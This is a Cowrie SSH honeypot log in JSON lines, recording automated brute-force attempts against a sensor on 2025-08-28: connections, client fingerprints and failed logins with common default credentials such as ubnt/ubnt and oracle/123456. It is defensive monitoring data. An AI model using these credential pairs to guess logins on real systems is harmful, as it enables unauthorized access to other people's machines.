{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":38226,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee238909ac70","protocol":"ssh","message":"New connection: 185.93.89.7:38226 (1.2.3.4:22) [session: ee238909ac70]","sensor":"my-vps","timestamp":"2025-08-28T09:38:55.798961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:38:55.799877Z","src_ip":"185.93.89.7","session":"ee238909ac70"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:38:55.817429Z","src_ip":"185.93.89.7","session":"ee238909ac70"}
{"eventid":"cowrie.login.failed","username":"index","password":"789456","message":"login attempt [index/789456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:38:55.854319Z","src_ip":"185.93.89.7","session":"ee238909ac70"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:38:56.937311Z","src_ip":"185.93.89.7","session":"ee238909ac70"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":39784,"dst_ip":"1.2.3.4","dst_port":22,"session":"271fa57e9a24","protocol":"ssh","message":"New connection: 51.79.164.132:39784 (1.2.3.4:22) [session: 271fa57e9a24]","sensor":"my-vps","timestamp":"2025-08-28T09:39:06.368035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:39:06.448523Z","src_ip":"51.79.164.132","session":"271fa57e9a24"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:39:06.935374Z","src_ip":"51.79.164.132","session":"271fa57e9a24"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:39:08.453185Z","src_ip":"51.79.164.132","session":"271fa57e9a24"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:39:09.932690Z","src_ip":"51.79.164.132","session":"271fa57e9a24"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":45222,"dst_ip":"1.2.3.4","dst_port":22,"session":"afd4a00e4bb3","protocol":"ssh","message":"New connection: 185.93.89.7:45222 (1.2.3.4:22) [session: afd4a00e4bb3]","sensor":"my-vps","timestamp":"2025-08-28T09:39:20.126375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:39:20.167050Z","src_ip":"185.93.89.7","session":"afd4a00e4bb3"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:39:20.167844Z","src_ip":"185.93.89.7","session":"afd4a00e4bb3"}
{"eventid":"cowrie.login.failed","username":"index","password":"qwerty12","message":"login attempt [index/qwerty12] failed","sensor":"my-vps","timestamp":"2025-08-28T09:39:20.398043Z","src_ip":"185.93.89.7","session":"afd4a00e4bb3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:39:21.418330Z","src_ip":"185.93.89.7","session":"afd4a00e4bb3"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":40116,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7516ab038d6","protocol":"ssh","message":"New connection: 51.79.164.132:40116 (1.2.3.4:22) [session: d7516ab038d6]","sensor":"my-vps","timestamp":"2025-08-28T09:39:32.184257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:39:32.403125Z","src_ip":"51.79.164.132","session":"d7516ab038d6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:39:32.403798Z","src_ip":"51.79.164.132","session":"d7516ab038d6"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-28T09:39:35.257698Z","src_ip":"51.79.164.132","session":"d7516ab038d6"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:39:36.450819Z","src_ip":"51.79.164.132","session":"d7516ab038d6"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":43696,"dst_ip":"1.2.3.4","dst_port":22,"session":"15a29c874719","protocol":"ssh","message":"New connection: 185.93.89.7:43696 (1.2.3.4:22) [session: 15a29c874719]","sensor":"my-vps","timestamp":"2025-08-28T09:39:44.078327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:39:44.140265Z","src_ip":"185.93.89.7","session":"15a29c874719"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:39:44.141206Z","src_ip":"185.93.89.7","session":"15a29c874719"}
{"eventid":"cowrie.login.failed","username":"index","password":"102030","message":"login attempt [index/102030] failed","sensor":"my-vps","timestamp":"2025-08-28T09:39:44.319479Z","src_ip":"185.93.89.7","session":"15a29c874719"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:39:45.339290Z","src_ip":"185.93.89.7","session":"15a29c874719"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":19721,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f1da593468e","protocol":"ssh","message":"New connection: 212.227.235.229:19721 (1.2.3.4:22) [session: 3f1da593468e]","sensor":"my-vps","timestamp":"2025-08-28T09:39:54.275894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T09:39:54.276915Z","src_ip":"212.227.235.229","session":"3f1da593468e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T09:39:54.403158Z","src_ip":"212.227.235.229","session":"3f1da593468e"}
{"eventid":"cowrie.login.failed","username":"ryan","password":"12345","message":"login attempt [ryan/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T09:39:54.999898Z","src_ip":"212.227.235.229","session":"3f1da593468e"}
{"eventid":"cowrie.login.failed","username":"ryan","password":"abc123","message":"login attempt [ryan/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:39:56.129374Z","src_ip":"212.227.235.229","session":"3f1da593468e"}
{"eventid":"cowrie.login.failed","username":"ryan","password":"abcd123","message":"login attempt [ryan/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:39:57.257969Z","src_ip":"212.227.235.229","session":"3f1da593468e"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":59360,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fedf459b91a","protocol":"ssh","message":"New connection: 51.79.164.132:59360 (1.2.3.4:22) [session: 3fedf459b91a]","sensor":"my-vps","timestamp":"2025-08-28T09:39:58.035785Z"}
{"eventid":"cowrie.login.failed","username":"ryan","password":"abcd1234","message":"login attempt [ryan/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T09:39:58.401092Z","src_ip":"212.227.235.229","session":"3f1da593468e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:39:58.501907Z","src_ip":"51.79.164.132","session":"3fedf459b91a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:39:58.502534Z","src_ip":"51.79.164.132","session":"3fedf459b91a"}
{"eventid":"cowrie.login.failed","username":"ryan","password":"abc1234","message":"login attempt [ryan/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T09:39:59.540362Z","src_ip":"212.227.235.229","session":"3f1da593468e"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:40:00.669220Z","src_ip":"212.227.235.229","session":"3f1da593468e"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia123","message":"login attempt [nvidia/nvidia123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:40:01.516319Z","src_ip":"51.79.164.132","session":"3fedf459b91a"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:40:02.876094Z","src_ip":"51.79.164.132","session":"3fedf459b91a"}
{"eventid":"cowrie.session.connect","src_ip":"164.92.65.236","src_port":54274,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ead9cf7d7bb","protocol":"ssh","message":"New connection: 164.92.65.236:54274 (1.2.3.4:22) [session: 1ead9cf7d7bb]","sensor":"my-vps","timestamp":"2025-08-28T09:40:05.649379Z"}
{"eventid":"cowrie.client.version","version":"\u0000\u0000\u0004T","message":"Remote SSH version: \u0000\u0000\u0004T","sensor":"my-vps","timestamp":"2025-08-28T09:40:05.650642Z","src_ip":"164.92.65.236","session":"1ead9cf7d7bb"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:40:05.651937Z","src_ip":"164.92.65.236","session":"1ead9cf7d7bb"}
{"eventid":"cowrie.session.connect","src_ip":"164.92.65.236","src_port":54284,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b8c6bfce278","protocol":"ssh","message":"New connection: 164.92.65.236:54284 (1.2.3.4:22) [session: 6b8c6bfce278]","sensor":"my-vps","timestamp":"2025-08-28T09:40:05.972939Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_for_Windows_8.1","message":"Remote SSH version: SSH-2.0-OpenSSH_for_Windows_8.1","sensor":"my-vps","timestamp":"2025-08-28T09:40:05.973934Z","src_ip":"164.92.65.236","session":"6b8c6bfce278"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:40:06.131195Z","src_ip":"164.92.65.236","session":"6b8c6bfce278"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":50860,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d0af2031a81","protocol":"ssh","message":"New connection: 185.93.89.7:50860 (1.2.3.4:22) [session: 2d0af2031a81]","sensor":"my-vps","timestamp":"2025-08-28T09:40:07.543309Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:40:07.544412Z","src_ip":"185.93.89.7","session":"2d0af2031a81"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:40:07.577699Z","src_ip":"185.93.89.7","session":"2d0af2031a81"}
